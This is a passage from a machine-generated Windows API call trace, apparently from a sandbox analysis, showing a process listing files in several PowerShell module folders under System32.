lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e794980, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e794980, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x479, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disable-DscDebug.cdxml", cAlternateFileName="")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x497da680, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSCClassResources", cAlternateFileName="DSCCLA~1")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSCResources", cAlternateFileName="DSCRES~1")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x4971bfa0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x4971bfa0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Enable-DscDebug.cdxml", cAlternateFileName="")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911fb160, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911fb160, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x556, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91436600, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91436600, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DscConfigurationStatus.cdxml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911fb160, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911fb160, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140aa479, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DSCLocalConfigurationManager.cdxml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fbaa320, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fbaa320, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3f4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e617bc0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e617bc0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x13da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.psd1", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9002c0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d9002c0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16224f68, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x30f02, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.psm1", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d23880, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91d23880, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16224f68, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0xe05, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f4d8a0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f4d8a0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x173b77b8, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDscXMachine.psm1", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140e9c6c, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x95d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Remove-DscConfigurationDocument.cdxml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912df9a0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x912df9a0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140e9c6c, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x452, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140eea8f, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stop-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x4971bfa0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x4971bfa0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebDownloadManager", cAlternateFileName="WEBDOW~1")) returned 1 [0157.842] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.842] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x70 [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x70, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x70 [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x70, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0157.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.843] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d2788 | out: lpFileInformation=0x25d2788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e617bc0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e617bc0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x13da)) returned 1 [0157.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0157.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0157.844] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.844] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.844] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psd1", cAlternateFileName="PSDIAG~1.PSD")) returned 1 [0157.844] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psm1", cAlternateFileName="PSDIAG~1.PSM")) returned 1 [0157.844] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psm1", cAlternateFileName="PSDIAG~1.PSM")) returned 0 [0157.844] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0157.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d2d78 | out: lpFileInformation=0x25d2d78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0157.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0157.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0157.845] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.846] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.846] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904e3860, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x904e3860, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.Format.ps1xml", cAlternateFileName="")) returned 1 [0157.846] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905a1f40, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x905a1f40, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.psd1", cAlternateFileName="")) returned 1 [0157.846] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f73a00, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f73a00, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.types.ps1xml", cAlternateFileName="")) returned 1 [0157.846] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f73a00, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f73a00, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.types.ps1xml", cAlternateFileName="")) returned 0 [0157.846] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0157.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x56, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0157.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0157.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x56, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0157.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d35c8 | out: lpFileInformation=0x25d35c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905a1f40, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x905a1f40, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3ee)) returned 1 [0157.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0157.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0157.847] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, 